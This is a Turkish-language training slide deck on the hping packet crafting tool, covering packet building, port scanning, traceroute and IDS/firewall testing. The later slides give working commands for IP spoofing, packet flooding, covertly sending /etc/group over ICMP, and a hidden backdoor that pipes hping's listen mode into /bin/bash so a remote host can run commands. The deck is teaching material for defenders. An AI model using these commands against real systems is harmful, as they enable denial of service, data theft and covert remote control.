Tcp ip
 
TCP/IP Ağlarda Parçalanmış Paketler ve Etkileri
TCP/IP Ağlarda Parçalanmış Paketler ve EtkileriTCP/IP Ağlarda Parçalanmış Paketler ve Etkileri
TCP/IP Ağlarda Parçalanmış Paketler ve Etkileri
 
Packet-O-Matic:Network Forensic Aracı
Packet-O-Matic:Network Forensic AracıPacket-O-Matic:Network Forensic Aracı
Packet-O-Matic:Network Forensic Aracı
 
PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI
 
AğAğ
 
Python İle Ağ Programlama
Python İle Ağ ProgramlamaPython İle Ağ Programlama
Python İle Ağ Programlama
 
IP, IGP, MPLS Eğitim Sunumu @Çankaya Üniversitesi
IP, IGP, MPLS Eğitim Sunumu @Çankaya Üniversitesi IP, IGP, MPLS Eğitim Sunumu @Çankaya Üniversitesi
IP, IGP, MPLS Eğitim Sunumu @Çankaya Üniversitesi
 
Suricata ile siber tehdit avcılığı
Suricata ile siber tehdit avcılığıSuricata ile siber tehdit avcılığı
Suricata ile siber tehdit avcılığı
 
Cmd (ms dos) komutları cansu salduz
Cmd (ms dos) komutları cansu salduzCmd (ms dos) komutları cansu salduz
Cmd (ms dos) komutları cansu salduz
 
Holynix v2
Holynix v2Holynix v2
Holynix v2
 
Temel ag prog_yapilari_mseml
Temel ag prog_yapilari_msemlTemel ag prog_yapilari_mseml
Temel ag prog_yapilari_mseml
 
İnformation Gathering - Bilgi Toplama (Cyber Security - Siber Güvenlik))
İnformation Gathering - Bilgi Toplama (Cyber Security - Siber Güvenlik))İnformation Gathering - Bilgi Toplama (Cyber Security - Siber Güvenlik))
İnformation Gathering - Bilgi Toplama (Cyber Security - Siber Güvenlik))
 
Nmap kullanimi
Nmap kullanimiNmap kullanimi
Nmap kullanimi
 
PIC Programlama, Assembly ve Komutlar
PIC Programlama, Assembly ve KomutlarPIC Programlama, Assembly ve Komutlar
PIC Programlama, Assembly ve Komutlar
 
Ine Multicast
Ine MulticastIne Multicast
Ine Multicast
 
Siber Güvenlik ve Etik Hacking Sunu - 4
Siber Güvenlik ve Etik Hacking Sunu - 4Siber Güvenlik ve Etik Hacking Sunu - 4
Siber Güvenlik ve Etik Hacking Sunu - 4
 
öDev
öDevöDev
öDev
 

More from BGA Cyber Security

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiBGA Cyber Security
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfBGA Cyber Security
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiBGA Cyber Security
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?BGA Cyber Security
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBGA Cyber Security
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketlerBGA Cyber Security
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıBGA Cyber Security
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020BGA Cyber Security
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriBGA Cyber Security
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakBGA Cyber Security
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIBGA Cyber Security
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiBGA Cyber Security
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziBGA Cyber Security
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİBGA Cyber Security
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Cyber Security
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerBGA Cyber Security
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsBGA Cyber Security
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi ToplamaBGA Cyber Security
 

More from BGA Cyber Security (20)

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketler
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
 
Open Source SOC Kurulumu
Open Source SOC KurulumuOpen Source SOC Kurulumu
Open Source SOC Kurulumu
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
 
Siber Fidye 2020 Raporu
Siber Fidye 2020 RaporuSiber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
 

Hping, TCP/IP Paket Üretici

  • 2. Bölüm İçeriği • TCP/IP Paketleriyle Oynama • Hping paket üretim aracı • Artıları ve eksileriyle hping • Hping kurulum ve kullanımı • Hping ile TCP/UDP/ICMP paket üretimi • Hping ile port tarama
  • 3. TCP/IP Paketleriyle Oynama • Amaç: TCP/IP Protokolünü daha iyi tanımak. • Paketlerin özelliklerini tanıyarak kötü amaçlı kullanımlarını incelemek
  • 4. Neden Hping? -I • İstenilen türde TCP/IP paketleri oluşturmak için kullanılan bir araç. Scapy, nemesis gibi • Oluşturulacak paketlerde tüm alanları kendimize özgü belirlenebilir – Tcp bayraklari, window size, port, ip • dinleme modu ile hostlara arası dosya transferi ve komut çalıştırma özelliği(Truva ati?) • IDS/IPS testleri için özel veri alanı belirtilebilmesi(ids imzalarinin testi) – Exploit imzaları
  • 5. Hping Eksiklikleri • L2 seviyesinde paket oluşturamama • Tarama yaparken birden fazla hedefe düzenli paket gönderememe • ICMP paketleri için yeterli derecede esnek, kolay komut satırı seçenekleri sunmama
  • 6. Kurulumu • Linux/UNIX/Windows Sistemlerde çalışır • Linux sistemler için – Yum install hping3 – apt-get install hping3 • *BSD sistemler için pkg_add –vr hping3 • Windows için hazır kurulum paketleri – www.hping.org
  • 7. Temel Hping Kullanımı • Bilinmesi Gerekenler – Öntanımlı olarak hping icmp yerine TCP paketlerini kullanır – Boş(herhangi bir bayrak set edilmemiş) bir tcp paketini hedef sistemin 0 portuna gönderir. • Tcpdump Çıktısı – # tcpdump -i eth0 -tttnn tcp port 0 – IP 192.168.1.5.1894 > 192.168.1.1.0: . win 512 – IP 192.168.1.5.1895 > 192.168.1.1.0: . win 512
  • 8. Komut satırı Seçenekleri #hping – h Komutuyl a kullanılab ilecek tüm seçenekl er #man hping İle detay kullanım bilgisi
  • 9. Hping Çalışma Modları • Varsayılan mod: TCP • #hping3 -0 --rawip Raw ip paketleri kullanmak için -1 --icmp Icmp Paketi oluşturmak için. -2 --udp UDP Paketleri oluşturmak için. -8 –scan Klasik Tarama modu. -9 –listen Dinleme modu
  • 10. TCP Paketleri ile Oynamak • Hping ile tcp paketleri üretebilmek için TCP yapısı iyi bilinmelidir. • Sniffer çıktısından inceleme – TCP Oturumunun hakimi Bayraklar!!
  • 11. TCP Başlığı Sniffer Çıktısı
  • 12. TCP Paketleri Oluşturmak-I • SYN Bayraklı TCP Paketi • # hping -S 192.168.1.1 • HPING 192.168.1.1 (eth0 192.168.1.1): S set, 40 headers + 0 data bytes len=46 ip=192.168.1.1 ttl=255 DF id=0 sport=0 flags=RA seq=0 win=0 rtt=2.5 ms • !!-c parametresi ile kaç adet paket gönderileceği belirtilir!! • Tcpdump çıktısı • # tcpdump -i eth0 -ttttnn tcp and host 192.168.1.1 • 2007-07-05 19:44:30.096849 IP 192.168.1.4.2244 > 192.168.1.1.0: S 2019758107:2019758107(0) win 512 • 2007-07-05 19:44:30.097393 IP 192.168.1.1.0 > 192.168.1.4.2244: R 0:0(0) ack 2019758108 win 0
  • 13. TCP Paketleri Oluşturmak-II • RST Bayraklı TCP Paketi Oluşturma • # hping -R -c 3 192.168.1.1 • HPING 192.168.1.1 (eth0 192.168.1.1): R set, 40 headers + 0 data bytes • Benzer şekilde –R yerine diğer TCP bayrak tipleri konularak istenilen türde TCP paketi oluşturulabilir.
  • 14. TCP Paketleri Oluşturmak-III • 1000. porta RST, FIN, PUSH ve SYN bayrakları set edilmiş paket gönderimi • # hping -RFSP -c 3 192.168.1.1 -p 1000 • HPING 192.168.1.1 (eth0 192.168.1.1): RSFP set, 40 headers + 0 data bytes --- • 192.168.1.1 hping statistic --- 3 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms • -p parametresi kullanılarak hedef sisteme gönderilen paketlerin hangi porta gideceği belirtilir. Default olarak bu değer 0 dır. • -s parametresi ile kaynak TCP portu değiştirilebilir, öntanımlı olarak bu değer rastgele atanır.
  • 15. UDP Paketleri ile Oynamak • # hping --udp 194.27.72.88 -s 53 -p 53 -b -y -c 1 -t 11 • HPING 194.27.72.88 (eth0 194.27.72.88): udp mode set, 28 headers + 0 data bytes • -b badcksum • -y DF • -t TTL • # tcpdump -i ste0 -tnn -vv udp port 53 • 88.234.152.48.53 > 194.27.72.88.53: [bad udp cksum 52cd!] 0 [0q] (0) (DF) (ttl 3, id 30147, len 28)
  • 16. ICMP & IP Paketleri ile Oynama
  • 17. ICMP Paketleri • ICMP paketlerinde TCP ve UDP’deki gibi port değeri yoktur bunlara benzer olarak icmp type ve icmp code değerleri vardır. • Hata belirleme Amaçlı kullanılır(UDP Kapalı port örneği, TTL Expired örneği) • Bir ICMP paketinin ne işe yaradığı bu değerlerle belirlenir. Bazı icmp type değerleri ek olarak icmp code değerine de sahiptir. • Mesela icmp type 3’un 15 farkli code degeri vardir... • icmp type 3 mesajı: Destination Unreachable – 0 Net Unreachable ? 1 Host Unreachable ? 2 Protocol Unreachable ? 3 Port Unreachable ? • Klasik ping paketi oluşturalım – # hping --icmp 192.168.1.1 -c 1
  • 18. UDP & ICMP Paketi • Kapalı UDP portuna istek gönderelim – # hping --udp 192.168.1.1 -p 9000 -n -c 1 – HPING 192.168.1.1 (eth0 192.168.1.1): udp mode set, 28 headers + 0 data bytes ICMP Port Unreachable from ip=192.168.1.1 • # tcpdump -i eth0 -ttttnn udp or icmp and host 192.168.1.1 • 2007-07-05 20:15:49.368744 IP 192.168.1.4.2548 > 192.168.1.1.9000: UDP, length 0 • 2007-07-05 20:15:49.369452 IP 192.168.1.1 > 192.168.1.4: ICMP 192.168.1.1 udp port 9000 unreachable, length 36
  • 19. Hping ile IP Spoofing • #hping -a 123.123.123.234 --udp 194.27.72.88 -s 900 -p 900 -b -y -c 1 -t 11 HPING 194.27.72.88 (eth0 194.27.72.88): udp mode set, 28 headers + 0 data bytes • Bu paket Firewall/modem’inizi aşıp interente gidebiliyorsa kurallarınızı gözden geçirin! • Neden?? İç ağdan size ait olmayan bir ip adresinden paketler gönderiyorsunuz. Önünüzdeki cihaz(Router, modem, Firewall) kaynak ip adresini mutlaka kontrol etmeli ve kendi agina ait olmayan kaynak iplerden paket almamalı. • A firmasından geliyormuş gibi B firmasında DOS saldırısı yapılabilir
  • 20. Port Tarama Aracı olarak Hping • ++port_numarasi kullanarak her seferinde port numarasının bir artmasını sağla
  • 21. Port Tarama Aracı olarak hping -II • Daha düzenli çıktı almak için --scan parametresi kullanılabilir.
  • 22. SYN Scan/FIN Scan/Null Scan/Xmas Tarama Çeşitleri • Xmas Scan Örneği Bu tarama tipinde amaç hedef sisteme FIN/URG/PSH bayrakları set edilmiş TCP paketleri göndererek Kapali sistemler için RST/ACK Açık sistemler için cevap dönmemesini beklemektir. • #hping –FUP hedef_sistem -p 80 – OpenBSD PacketFilter scrub özelliği bu tip anormal paketleri engeller.
  • 23. Traceroute Aracı olarak Hping • Hping çeşitli protokolleri(ICMP, UDP, TCP) kullanarak Traceroute işlevi görebilir. • -t ile ilk paketin hangi TTL değeri ile başlayacağı belirtilir. –z ile TTL değerini istediğimiz zaman Ctrl ^z tuş fonksiyonları ile arttırabiliriz. -p ile port numarası belirtilir, herhangi bir port numarası belirledikten sonra tarama esnasında CTRL^z tusuna basarak her pakette port numarasının bir arttırılmasını sağlayabiliriz.
  • 24. UDP Traceroute • hping3 --udp -p 53 91.93.119.80 -T
  • 25. Firewall Performans Testleri • --rand-source • --rand-dest 91.93.119.x • --flood 1 saniye 1.000.0000 mikro saniye
  • 26. Hedef Sistem Hakkında Bilgi Edinmek • Sequence numarası tahmini • Hedef Sistemin Uptime Süresi Belirleme • Hedef sistemin zamanını belirleme • Hedef sistemin ağ maskesini belirleme etc...
  • 28. Hedef Sistemin Uptime Süresi Belirleme
  • 29. IDS/IPS Testlerinde Hping Kullanımı • Rastgele özellikte paketler oluşturarak – Fragmented, bozuk ip versiyon bilgisi, tcp, udp başlık bilgisi. • Kaynak ip adreslerini spoof ederek • Paket seli oluşturarak sistemin performansı ölçülebilir. • Exploit içeriklerini parametre olarak vererek
  • 30. IDS/IPS Testlerinde Hping Kullanımı-II • Hazırladığımız bir exploit içeriğini IDS kurallarını test etmek için kullanalım – # more exptest GET /scripts/slxweb.dll/view? name=mainpage HTTP/1.0 ,
  • 31. IDS/IPS Testlerinde Hping Kullanımı-II • Aşağıdaki gibi bir Snort kuralımız olsun – alert tcp $EXTERNAL_NET any -> $TELNET_SERVERS 23 (msg:"TELNET xyz exploit attempt"; flow:to_server; content:"bin/sh"; classtype:she llcode-detect; sid:1430; rev:7;) • Exploit içeriğimiz: # cat snort_test bin/sh • Paketi gönderelim – # hping -n -c 1 -P 192.168.1.4 -p 23 -d 50 -E snort_test • Snort Loglarına bakacak olursak kuralımızın tetiklendiğini görürüz. – [**] [1:1430:7] TELNET xyz exploit attempt [**] [Classification: Executable code was detected] [Priority: 1] 07/12- 21:53:46.758684 192.168.1.5:2445 -> 192.168.1.4:23 TCP TTL:64 TOS:0x0 ID:49841 IpLen:20 DgmLen:90 ****P*** Seq: 0x16AB9A80 Ack: 0x37A74B05 Win: 0x200 TcpLen: 20
  • 32. Hping taramalarının IDS'ler tarafından yakalanması. • Port tarama araçlarının kendilerine özgü imzaları vardır. NIDS gibi sistemler tarama yapan araçları bu imzalarından tanıyarak alarm üretirler. • Tarama Yaparken Kaynak Portları birer birer arttırır. – Nmap Sabit tutar!
  • 34. Hping ile Dosya Transferi • Bir hosttan diğerine /etc/group dosyasını gönderelim. • Gönderici Host – #hping --icmp 192.168.1.4 -d 200 --sign huzeyfe --file /etc/group • Dinleyici taraf • # hping --icmp 192.168.1.4 --listen huzeyfe --safe -I eth0 hping2 listen mode [main] memlockall(): Success Warning: can't disable memory paging! .. – .etc/group içeriği
  • 35. Hping ile uzak sistemlerde komut çalıştırma • A Sistemi / dinlemede olan taraf – # hping --listen gizli_kanal -n -p 22 |/bin/bash • B Sistemi /Gönderici • # nc 127.0.0.1 22 -n SSH-1.99- OpenSSH_4.4 • gizli_kanal touch /tmp/hping_irc • Protocol mismatch.
  • 36. Kapalı porta veri göndererek Komut Çalıştırma • Açık porta netcat ya da benzeri bir uygulama ile bağlanarak karşılama banneri sonrası komut gönderebiliyorduk fakat kapalı port için böyle bir seçeneğimiz yok. Zira daha TCP bağlantısı kurulmadan hedef porttan RST cevabı dönecektir.
  • 37. Kapalı porta veri göndererek Komut Çalıştırma • B Sistemi Kapali bir TCP portu bularak hping’e o porta gelen paketleri dinlemesi ve çıktılarını /bin/bash’e göndermesini söyleyeli • # hping --listen safeme -p 5555 -n |/bin/bash • A Sistemi Hedef sisteme göndermek istediğimiz komut/ları bir dosya içerisine kaydedelim. • #echo “touch /tmp/kapali_porta_geldim” > komut_dosyasi • # hping --sign safeme -d 50 -E komut_dosyasi -p 5555 192.168.1.5 -n -c 1